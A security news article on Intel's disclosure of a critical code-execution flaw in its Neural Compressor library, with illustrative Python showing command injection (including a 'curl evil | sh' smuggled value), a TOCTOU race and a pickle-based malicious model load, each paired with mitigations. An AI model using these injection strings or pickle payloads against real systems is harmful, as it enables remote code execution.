Intel Discloses Max Severity Bug in Its AI Model Compression Software

Published: 23/11/2024   Category: security




The improper input validation issue in Intel Neural Compressor enables remote attackers to execute arbitrary code on affected systems.



Intel has disclosed a maximum severity vulnerability in some versions of its Intel Neural Compressor software for AI model compression.
The bug, designated as CVE-2024-22476, provides an unauthenticated attacker with a way to execute arbitrary code on Intel systems running affected versions of the software. The vulnerability is the most serious among dozens of flaws the company disclosed in a set of 41 security advisories this week.
Intel identified CVE-2024-22476 as stemming from improper input validation, or a failure to properly sanitize user input. The chip maker has given the vulnerability a maximum score of 10 on the CVSS scale because the flaw is remotely exploitable with low complexity and has a high impact on data confidentiality, integrity, and availability. An attacker needs no special privileges, and no user interaction is required for an exploit to work.
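Intel has not published exploit details, but improper-input-validation bugs of this class typically involve an exposed service passing attacker-controlled fields into a command or code path unchecked. The sketch below is a hypothetical illustration of that pattern, not the actual Neural Compressor code; the endpoint, field, and "optimizer" binary names are invented for the example:

```python
# Hypothetical illustration of improper input validation leading to remote
# code execution; NOT the actual CVE-2024-22476 code. Endpoint, field, and
# binary names are invented for the example.
from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/compress", methods=["POST"])
def compress():
    model_path = request.json["model_path"]  # attacker-controlled string
    # Vulnerable: with shell=True, a value like "m.onnx; curl evil | sh"
    # is interpreted by the shell and executes arbitrary commands.
    subprocess.run(f"optimizer {model_path}", shell=True)
    return "ok"

@app.route("/compress-safe", methods=["POST"])
def compress_safe():
    model_path = request.json["model_path"]
    # Safer: validate the input and pass arguments as a list, with no shell.
    if not model_path.endswith(".onnx") or "/" in model_path:
        return "rejected", 400
    subprocess.run(["optimizer", model_path])
    return "ok"
```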
The vulnerability affects Intel Neural Compressor versions before 2.5.0. Intel has recommended that organizations using the software upgrade to version 2.5.0 or later. Intel's advisory indicated that the company learned of the vulnerability from an external security researcher or entity whom the company did not identify.
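For teams unsure whether they are running an affected build, a quick check (assuming the library was installed from PyPI under the package name neural-compressor) might look like this:

```python
# Check the installed Intel Neural Compressor version; builds earlier than
# 2.5.0 are affected by CVE-2024-22476. Assumes the PyPI name "neural-compressor".
from importlib.metadata import PackageNotFoundError, version

try:
    installed = version("neural-compressor")
    print(f"neural-compressor {installed} installed; upgrade if below 2.5.0")
except PackageNotFoundError:
    print("neural-compressor is not installed")
```

From there, `pip install --upgrade "neural-compressor>=2.5.0"` (or the equivalent in your dependency manager) picks up a patched release.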
Intel Neural Compressor is an open source Python library that helps compress and optimize deep learning models for tasks such as computer vision, natural language processing, recommendation systems, and a variety of other use cases. Compression techniques include neural network pruning, or removing the least important parameters; reducing memory requirements via a process called quantization; and distilling a larger model into a smaller one with similar performance. The goal of AI model compression technology is to enable the deployment of AI applications on diverse hardware devices, including those with limited or constrained computational power, such as mobile devices.
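As a rough, toy-scale sketch of two of those techniques (not Neural Compressor's implementation), magnitude pruning zeroes the smallest weights and int8 quantization maps float32 values onto 256 discrete levels, cutting storage per weight from four bytes to one:

```python
import numpy as np

def magnitude_prune(w: np.ndarray, sparsity: float = 0.5) -> np.ndarray:
    """Pruning: zero out the smallest-magnitude parameters."""
    threshold = np.quantile(np.abs(w), sparsity)
    return np.where(np.abs(w) < threshold, 0.0, w).astype(w.dtype)

def quantize_int8(w: np.ndarray):
    """Symmetric quantization: store weights as int8 plus one float scale."""
    scale = np.abs(w).max() / 127.0
    q = np.clip(np.round(w / scale), -127, 127).astype(np.int8)
    return q, scale

w = np.random.randn(256, 256).astype(np.float32)
pruned = magnitude_prune(w)               # half the weights become zero
q, scale = quantize_int8(pruned)          # 4 bytes/weight -> 1 byte/weight
reconstructed = q.astype(np.float32) * scale
print("max abs error:", np.abs(reconstructed - pruned).max())  # <= scale / 2
```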
CVE-2024-22476 is one of two vulnerabilities in Intel's Neural Compressor software that the company disclosed, and for which it released a fix, this week. The other is CVE-2024-21792, a time-of-check-time-of-use (TOCTOU) flaw that could result in information disclosure. Intel assessed the flaw as presenting only a moderate risk because, among other things, it requires an attacker to already have local, authenticated access to a vulnerable system to exploit it.
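TOCTOU flaws arise when software checks a resource and then uses it in two separate steps, leaving a race window in which a local attacker can swap the resource between the two. Intel has not published details of CVE-2024-21792; the classic file-based form of the pattern, shown purely as an illustration, looks like this:

```python
import os

# Set up a demo file in a hypothetical shared, world-writable location.
os.makedirs("/tmp/shared", exist_ok=True)
path = "/tmp/shared/result.bin"
with open(path, "wb") as f:
    f.write(b"demo")

# Vulnerable pattern: between the access() check (time of check) and the
# open() call (time of use), a local attacker can replace the file, e.g.
# with a symlink to data the victim process can read but the attacker cannot.
if os.access(path, os.R_OK):          # time of check
    data = open(path, "rb").read()    # time of use

# Mitigation (POSIX): open first, refusing symlinks, then operate on the
# file descriptor, so the check and the use refer to the same object.
fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
try:
    data = os.read(fd, 1 << 20)
finally:
    os.close(fd)
```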
In addition to the Neural Compressor flaws, Intel also disclosed five high-severity privilege escalation vulnerabilities in its UEFI firmware for server products. Intel's advisory listed all five vulnerabilities (CVE-2024-22382, CVE-2024-23487, CVE-2024-24981, CVE-2024-23980, and CVE-2024-22095) as input validation flaws, with severity scores ranging from 7.2 to 7.5 on the CVSS scale.
The Neural Compressor vulnerabilities are examples of what security analysts have recently described as the expanding, but often overlooked, attack surface that AI software and tools are creating at enterprise organizations. Much of the security concern around AI software so far has centered on the risks of using large language models and LLM-enabled chatbots like ChatGPT. Over the past year, researchers have released numerous reports on the susceptibility of these tools to model manipulation, jailbreaking, and several other threats.
What has received somewhat less focus so far is the risk to organizations from vulnerabilities in some of the core software components and infrastructure used to build and support AI products and platforms. Researchers from Wiz, for instance, recently found weaknesses in the widely used Hugging Face platform that gave attackers a way to tamper with models in the registry or to upload weaponized ones with relative ease. A recent study commissioned by the UK's Department for Science, Innovation and Technology identified numerous potential cyber-risks to AI technology at every life cycle stage, from the software design phase through development, deployment, and maintenance. The risks range from a failure to do adequate threat modeling and to account for secure authentication and authorization in the design phase, to code vulnerabilities, insecure data handling, inadequate input validation, and a long list of other issues.
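One concrete reason weaponized model uploads matter: several common model formats are serialized with Python's pickle, and unpickling runs attacker-controlled code by design. This generic demonstration (not the specific Wiz findings) shows a crafted "model" artifact executing a command the moment it is loaded:

```python
import os
import pickle

class WeaponizedModel:
    # pickle calls __reduce__ during deserialization, so a crafted model
    # artifact can name an arbitrary callable to run at load time.
    def __reduce__(self):
        return (os.system, ("echo arbitrary code ran at model-load time",))

blob = pickle.dumps(WeaponizedModel())   # what an attacker would upload
pickle.loads(blob)                       # "loading the model" runs the command
```

Formats such as safetensors exist largely to avoid this class of problem; treating downloaded model files as untrusted code remains the safer default.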
